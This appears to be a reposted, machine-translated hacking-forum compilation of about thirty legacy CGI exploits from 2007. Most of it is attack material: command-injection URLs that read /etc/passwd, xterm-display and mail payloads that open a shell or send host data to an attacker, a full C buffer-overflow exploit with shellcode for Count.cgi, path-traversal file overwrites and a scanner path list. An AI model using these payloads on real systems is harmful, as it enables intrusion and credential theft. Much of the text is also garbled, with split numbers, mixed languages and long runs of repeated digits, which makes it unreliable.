CGI vulnerability highlights-vulnerability warning-the black bar safety net

2007-06-18T00:00:00
ID MYHACK58:62200715848
Type myhack58
Reporter 佚名
Modified 2007-06-18T00:00:00

Description

CGI vulnerability highlights For the following list of CGI vulnerabilities,simply speaking,you can directly delete the program or rewrite the program to reach the safety of the mesh The Below is not completely reprinted from the green Forum(via a Supplement) A. phf vulnerability The phf vulnerability seems to be the most classic,almost all of the articles will be introduced,you can execute Server commands,such as display the /etc/passwd: lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd But we can still find it? II. php. cgi 2. 0beta10 or earlier version of the vulnerability Can read nobody permissions of all the files. lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd php. cgi version 2.1 can only read the shtml file. For the password file,comrades should pay attention to what,maybe possible in /etc/master. passwd /etc/security/passwd etc. III. whois_raw. cgi lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xter m%2 0-display%20graziella. lame. org:0 IV. faxsurvey lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd 五 .textcounter.pl 如果 服务器 上 有 textcounter.pl all people can to the http daemon's permissions to execute commands.

!/ usr/bin/perl

$URL='http://dtp.kappa.ro/a/test.shtml'; # please DO modify this $EMAIL='pdoru@pop3.kappa.ro,root'; # please DO modify this if ($ARGV[0]) { $CMD=$ARGV[0];}else{ $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothe re_one"; }$text="${URL}/;IFS=\8;${CMD};echo|";$text =~ s/ /\$\{IFS\}/g;#print "$text\ n"; system({"wget"} "wget", $text, "-O/dev/null"); system({"wget"} "wget", $text, "-O/dev/null");

system({"lynx"} "lynx", $text); #if there is no wget command can also be used with lynx

system({"lynx"} "lynx", $text);

VI. Some version(1.1)of the info2www vulnerability $ REQUEST_METHOD=GET ./ info2www'(../../../../../../../bin/mail jami asswd|)' $ You have new mail. $ Honestly, I don't quite understand.: ( VII. pfdispaly. cgi lynx-source \ 'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd' pfdisplay. cgi there's another vulnerability you can execute the command lynx-dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'% 0A/bin/uname%2 0-a|'

or lynx-dump \ http://victim/cgi-bin/pfdispaly.cgi?'% 0A/usr/bin/X11/xclock%2 0-display%20evi l:0.0|' VIII. wrap lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc IX. www-sql You can read some restricted pages such as: 在 你 的 浏览器 里 输入 :http://your.server/protected/something.html: Be asked to enter the account number and password. And have www-sql don't have to: http://your.server/cgi-bin/www-sql/protected/something.html: Ten. view-source lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/pass wd XI. campas lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a XII. webgais telnet www.victim.com 8 0 POST /cgi-bin/webgais HTTP/1.0 Content-length: 8 5 (replace this with the actual length of the "exploit"line ) query=';mail+drazvan\@pop3.kappa.roparagraph XIII. websendmail telnet www.victim.com 8 0 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the the string passed to the server, in this case xxx=9 0) receiver=;mail+your_address\@somewhere.orgubject=a&content=a XIV. handler telnet www.victim.com 8 0 GET /cgi-bin/handler/useless_shit;cat /etc/passwd|? data=DownloadHTTP/1.0 or GET /cgi-bin/handler/blah;xwsh-display yourhost.com/?data=Download or GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/s h|? data=Download Note,the cat is the TAB key instead of spaces,the server will report can't open useless_shit,but still execute the following command Order. Fifteen. the test-cgi lynx http://www.victim.com/cgi-bin/test-cgi?\whatever CGI/1.0 test script report: argc is 0. argv is . SERVER_SOFTWARE = NCSA/1.4 B SERVER_NAME = victim.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/1.0 SERVER_PORT = 8 0 REQUEST_METHOD = GET HTTP_ACCEPT = text/plain, application/x-html, application/html, text/html, text/x-html PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /cgi-bin/test-cgi QUERY_STRING = whatever REMOTE_HOST = fifth.column.gov REMOTE_ADDR = 200.200.200.200 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = Get some http directory lynx http://www.victim.com/cgi-bin/test-cgi?\help&0a/bin/cat%2 0/etc/passwd This trick seems to not work.: ( lynx http://www.victim.com/cgi-bin/nph-test-cgi?/ You can also so try GET /cgi-bin/test-cgi? HTTP/1.0 GET /cgi-bin/test-cgi? x * GET /cgi-bin/nph-test-cgi? HTTP/1.0 GET /cgi-bin/nph-test-cgi? x * GET /cgi-bin/test-cgi? x HTTP/1.0 * GET /cgi-bin/nph-test-cgi? x HTTP/1.0 * XVI. For some BSD apache can: lynx http://www.victim.com/root/etc/passwd lynx http://www.victim.com/~root/etc/passwd XVII. htmlscript lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd XVIII. jj. c The demo cgi program jj. c calls /bin/mail without filtering user input, so any program based on jj. c could potentially be exploited by simply adding a followed by a Unix command. It may require a password, but two known passwords include HTTPdrocks and SDGROCKS. If you can retrieve a copy of the compiled program running strings on it will probably réveil the password. Do a web search on jj. c to get a copy and study the code yourself if you have more questions. XIX. Frontpage extensions If you read http://www. victim. com/_vti_inf. html you will get the FP extensions version And it is in the path on the server. There are some password file such as: http://www.victim.com/_vti_pvt/service.pwd http://www.victim.com/_vti_pvt/users.pwd http://www.victim.com/_vti_pvt/authors.pwd http://www.victim.com/_vti_pvt/administrators.pwd 二十 .Freestats.com CGI Not come across,think some places can not be wrong,so a direct patch English. John Carlton found the following. He developed an exploit for the free web stats services offered at freestats.com, and supplied the webmaster with proper code to patch the bug. Start an account with freestats.com, and log in. Click on the the area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER INFO" This will call up a file called edit.pl with your user # and password included in it. Save this file to your hard disk and open it with notepad. The only form of security in this is a hidden attribute on the form element of your account number. Change this from input type=hidden name=account value=your# to input type=text name=account value=""* Save your page and load it into your browser. Their will now be a text input box where the hidden element was before. Simply type a

in and push the "click here to update user profile" and all the

information that appears on your screen has now been written to that user profile. But that isn't the worst of it. By using frames (2 frames, one to hold this page you just made, and one as a target for the form submission) you could change the password on all of their accounts with a simple JavaScript function. Deep inside the web site authors still have the good old "edit.pl" script. It takes some time to reach it (unlike the path described) but you can reach it directly at: http://www.sitetracker.com/cgi-bin/edit.pl?account=&password= Twenty-one. Vulnerability in Glimpse HTTP telnet target.machine.com 8 0 GET /cgi-bin/aglimpse/8 0|IFS=5;CMD=5mail5fyodor\@dhp.com\MD;echo HTTP/1.0 Twenty-two. Count. cgi The program is only to Count. cgi 2 4 The following version is valid: /### count. c########################################################/

include

include

include

include

include

include

include

include

include

/ Forwards / unsigned long getsp(int); int usage(char ); void doit(char ,long, char ); / Constants / char shell[]= "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30" "\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56" "\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10" "\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf" "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" "/usr/X11R6/bin/xterm0-ut0-display0"; char endpad[]= "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"; int main (int argc, char argv[]){ char shellcode = NULL; int cnt,ver,retcount, dispnum,dotquads[4],offset; unsigned long sp; char dispname[2 5 5]; char host; offset = sp = cnt = ver = 0; fprintf(stderr,"\t%s - Gus\n",argv[0]); if (argc<3) usage(argv[0]); while ((cnt = getopt(argc,argv,"h:d:v:")) != EOF) { switch(cnt){ case 'h': host = optarg; break; case 'd': { retcount = sscanf(optarg, "%d.% d.% d.% d:%d", &dotquads[0], &dotquads[1], &dotquads[2], &dotquads[3], &dispnum); if (retcount != 5) usage(argv[0]); sprintf(dispname, "%03d.% 03d.% 03d.% 03d:%01d", dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum); shellcode=malloc(strlen((char )optarg)+strlen(shell)+strlen(endpad)); sprintf(shellcode,"%s%s%s",shell,dispname,endpad); } break; case 'v': ver = atoi(optarg); break; case 'o': offset = atoi(optarg); break; default: usage(argv[0]); break; } } sp = offset + getsp(ver); (void)doit(host,sp,shellcode); exit(0); } unsigned long getsp(int ver) { / Get the stack pointer we should be using. YMMV. If it does not work, try using-o X, where x is between -1500 and 1 5 0 0 / unsigned long sp=0; if (ver == 1 5) sp = 0xbfffea50; if (ver == 2 0) sp = 0xbfffea50; if (ver == 2 2) sp = 0xbfffeab4; if (ver == 2 3) sp = 0xbfffee38; / Dunno about this one / if (sp == 0) { fprintf(stderr,"I don't have an sp for that version try using the-o option. \n"); fprintf(stderr,"Versions above 2 and 4 are patched for this bug.\ n"); exit(1); } else { return sp; } } int usage (char name) { fprintf(stderr,"\tUsage:%s-h host-d-v [-o ]\n ",name); fprintf(stderr,"\te. g. %s-h www.foo.bar -d 127.0.0.1:0-v 2 2\n",name); exit(1); } int openhost (char host, int port) { int sock; struct hostent he; struct sockaddr_in sa; he = gethostbyname(host); if (he == NULL) { perror("Bad hostname\n"); exit(-1); } memcpy(&sa. sin_addr, he->h_addr, he->h_length); sa. sin_port=htons(port); sa. sin_family=AF_INET; sock=socket(AF_INET,SOCK_STREAM,0); if (sock < 0) { perror ("cannot open socket"); exit(-1); } bzero(&sa. sin_zero,sizeof (sa. sin_zero)); if (connect(sock,(struct sockaddr )&sa,sizeof sa)<0) { perror("cannot connect to host"); exit(-1); } return(sock); } void doit (char host,long sp, char shellcode) { int cnt,sock; char qs[7 0 0 0]; int bufsize = 1 6; char buf[bufsize]; char chain[] = "user=a"; bzero(buf); for(cnt=0;cnt<4 1 0 4;cnt+=4) { qs[cnt+0] = sp & 0x000000ff; qs[cnt+1] = (sp & 0x0000ff00) >> 8; qs[cnt+2] = (sp & 0x00ff0000) >> 1 6; qs[cnt+3] = (sp & 0xff000000) >> 2 4; } strcpy(qs,chain); qs[strlen(chain)]=0x90; qs[4 1 0 4]= sp&0x000000ff; qs[4 1 0 5]=(sp&0x0000ff00)>>8; qs[4 1 0 6]=(sp&0x00ff0000)>>1 6; qs[4 1 0 7]=(sp&0xff000000)>>2 4; qs[4 1 0 8]= sp&0x000000ff; qs[4 1 0 9]=(sp&0x0000ff00)>>8; qs[4 1 1 0]=(sp&0x00ff0000)>>1 6; qs[4 1 1 1]=(sp&0xff000000)>>2 4; qs[4 1 1 2]= sp&0x000000ff; qs[41 1 3]=(sp&0x0000ff00)>>8; qs[4 1 1 4]=(sp&0x00ff0000)>>1 6; qs[4 1 1 5]=(sp&0xff000000)>>2 4; qs[4 1 1 6]= sp&0x000000ff; qs[4 1 1 7]=(sp&0x0000ff00)>>8; qs[4 1 1 8]=(sp&0x00ff0000)>>1 6; qs[4 1 1 9]=(sp&0xff000000)>>2 4; qs[4 1 2 0]= sp&0x000000ff; qs[4 1 2 1]=(sp&0x0000ff00)>>8; qs[4 1 2 2]=(sp&0x00ff0000)>>1 6; qs[4 1 2 3]=(sp&0xff000000)>>2 4; qs[4 1 2 4] a= sp&0x000000ff; qs[4 1 2 5]=(sp&0x0000ff00)>>8; qs[4 1 2 6]=(sp&0x00ff0000)>>1 6; qs[4 1 2 7]=(sp&0xff000000)>>2 4; qs[4 1 2 8]= sp&0x000000ff; qs[4 1 2 9]=(sp&0x0000ff00)>>8; qs[4 1 3 0]=(sp&0x00ff0000)>>1 6; qs[4 1 3 1]=(sp&0xff000000)>>2 4; strcpy((char)&qs[4 1 3 2],shellcode); sock = openhost(host,8 0); write(sock,"GET /cgi-bin/Count. cgi?", 2 3); write(sock,qs,strlen(qs)); write(sock," HTTP/1.0\n",1 0); write(sock,"User-Agent: ",1 2); write(sock,qs,strlen(qs)); write(sock,"\n\n",2); sleep(1); / printf("GET /cgi-bin/Count. cgi?% s HTTP/1.0\nUser-Agent: %s\n\n",qs,qs); * / / setenv("HTTP_USER_AGENT",qs,1); setenv("QUERY_STRING",qs,1); system("./ Count. cgi"); */ } With a Count. cgi look at the picture http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../../../. ./../ path_to_gif/file.gif Twenty-three. finger. cgi lynx http://www.victim.com/cgi-bin/finger?@localhost Get the host login user name. 二十 四 .man.sh Robert Moniot found followung. The May 1 9 9 8 issue of SysAdmin Magazine contains an article, "Web-Enabled Man Pages", which includes source code for very nice cgi script named man.sh to feed man pages to a web browser. The hypertext links to other man pages are an especially attractive feature. Unfortunately, this script is vulnerable to attack. Essentially, anyone who can execute the cgi thru their web browser can run any system commands with the user id of the web server and obtain the output from them in a web page. Twenty-five. FormHandler. cgi In the table add

Your mailbox is in/etc/passwd Twenty-six. JFS I believe we have seen the"JFS invasive PCWEEK-LINUX host of detailed process"in this article,he uses photoads The CGI module into the host. I have no actual attacks,see the article understanding that such The first lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?AdNum=31 3 3 7&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=%0a 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1&Phone=1 1&Subject=la&password=0&CityStPhone=0&Renewed=0" Create a new AD value to bypass the $AdNum after checking with lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?file=a.jp g&AdNum=1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 11 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1&DataFile=1&Password=0&FIL E_CONTENT=%0 0%0 0%0 0%0 0%0 0%0 0%0 0%0 0%0 0%0 0%0 0%0 0%0 0&FILE_NAME=/lala/\../../../ ../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif' Create/overwrite the user nobody has the right to write any file. Don't I understand whether,in its zip bag and I can't find to_url script,don't know which comrades know? Twenty-seven. backdoor 看 到现在 一些 cgichk.c 里 都 有 检查 木马 unlg1.1 和 rwwwshell.pl The previous one is UnlG write,I haven't seen the source code,there is a THC writing,packetstorm has it 1. 6 version of the source code. 二十 八 .visadmin.exe http://omni.server/cgi-bin/visadmin.exe?user=guest This command line will be non-stop to the server's hard drive to write something,know that write until full. Twenty-nine. campas > telnet www.xxxx.net 8 0 Trying 2 0 0. xx. xx. xx... Connected to venus.xxxx.net Escape character is '^]'. GET /cgi-bin/campas?% 0acat%0a/etc/passwd%0a root:x:0:1:Super-User:/export/home/root:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:7 1:8:Line Printer Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/:/bin/false .... Next thing you know what to do.: P Thirty. webgais query=';mail+foo@somewhere.nettelnet target.machine.com 8 0 POST /cgi-bin/webgais HTTP/1.0 Content-length: 8 5 (replace this with the actual length of the "exploit" line) query=';mail+drazvan\@pop3.kappa.roparagraph telnet target.machine.com 8 0 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the the string passed to the server, in this case xxx=9 0) receiver=;mail+your_address\@somewhere.orgubject=a &content=a Thirty-one. wrap http://sgi.victim/cgi-bin/wrap?/../../../../../etc Listed the etc directory of the file The following is likely to contain vulnerabilities all of the CGI program name,as for the other more vulnerability,are collected,here it Co Heart of hope to get your criticism and advice. /cgi-bin/rwwwshell.pl /cgi-bin/phf /cgi-bin/Count. cgi /cgi-bin/test. cgi /cgi-bin/nph-test-cgi /cgi-bin/nph-publish /cgi-bin/php. cgi /cgi-bin/handler /cgi-bin/webgais /cgi-bin/websendmail /cgi-bin/webdist. cgi /cgi-bin/faxsurvey /cgi-bin/htmlscript /cgi-bin/pfdisplay. cgi /cgi-bin/perl.exe /cgi-bin/wwwboard.pl /cgi-bin/www-sql /cgi-bin/view-source /cgi-bin/campas /cgi-bin/aglimpse /cgi-bin/glimpse /cgi-bin/man.sh /cgi-bin/AT-admin. cgi /scripts/no-such-file.pl /vti_bin/shtml.dll /_vti_inf.html /_vti_pvt/administrators. pwd /_vti_pvt/users. pwd /msadc/Samples/SelectOR/showcode. asp /scripts/iisadmin/ism. dll? http/dir /adsamples/config/site. csc /main. asp%8 1 /AdvWorks/equipment/catalog_type. asp? /cgi-bin/input. bat?| dir..\..\windows /index. asp::$DATA /cgi-bin/visadmin. exe? user=guest /? PageServices /ss. cfg /cgi-bin/get32. exe|echo%2 0>c:\file.txt /cgi-bin/cachemgr. cgi /cgi-bin/pfdispaly. cgi?/../../../../ etc/motd /domcfg. nsf /today. nsf /names. nsf /catalog. nsf /log. nsf /domlog. nsf /cgi-bin/AT-generate. cgi /secure/. wwwacl /secure/. htaccess /samples/search/webhits.exe /scripts/srchadm/admin. idq /cgi-bin/dumpenv.pl adminlogin? RCpage=/sysadmin/index. stm /c:/program /getdrvrs.exe /test/test. cgi /scripts/submit. cgi /users/scripts/submit. cgi /ncl_items. html? SUBJECT=2 0 9 7 /cgi-bin/filemail.pl /cgi-bin/maillist.pl /cgi -bin/jj /cgi-bin/info2www /cgi-bin/files.pl /cgi-bin/finger /cgi-bin/bnbform. cgi /cgi-bin/survey. cgi /cgi-bin/AnyForm2 /cgi-bin/textcounter.pl /cgi-bin/classifieds. cgi /cgi-bin/environ. cgi /cgi-bin/wrap /cgi-bin/cgiwrap /cgi-bin/guestbook. cgi /cgi-bin/edit.pl /cgi-bin/perlshop. cgi /_vti_inf.html /_vti_pvt/service. pwd /_vti_pvt/users. pwd /_vti_pvt/authors. pwd /_vti_pvt/administrators. pwd /cgi-win/uploader.exe /../../config.sys/iisadmpwd/achg. htr /iisadmpwd/aexp. htr /iisadmpwd/aexp2. htr /iisadmpwd/aexp4b. htr /iisadmpwd/aexp4b. htr cfdocs/expeval/ExprCalc. cfm? OpenFilePath=C:\WINNT\repair\sam. /cfdocs/expeval/openfile. cfm /cfdocs/expeval/openfile. cfm /GetFile. cfm? FT=Text&FST=Plain&FilePath=C:\WINNT\repair\sam._ /CFIDE/Administrator/startstop.html /cgi-bin/wwwboard.pl /_vti_pvt/shtml.dll /_vti_pvt/shtml.exe /cgi-dos/args. bat /cgi-win/uploader.exe /cgi-bin/rguest.exe /cgi-bin/wguest.exe /scripts/issadmin/bdir. htr /scripts/CGImail.exe /scripts/tools/newdsn.exe /scripts/fpcount.exe /cfdocs/expelval/openfile. cfm /cfdocs/expelval/exprcalc. cfm /cfdocs/expelval/displayopenedfile. cfm /cfdocs/expelval/sendmail. cfm /iissamples/exair/howitworks/codebrws. asp /iissamples/sdk/asp/docs/codebrws. asp /msads/Samples/SelectOR/showcode. asp /search97. vts /carbo.dll /cgi-bin/whois_raw. cgi? fqdn=%0Acat%2 0/etc/passwd 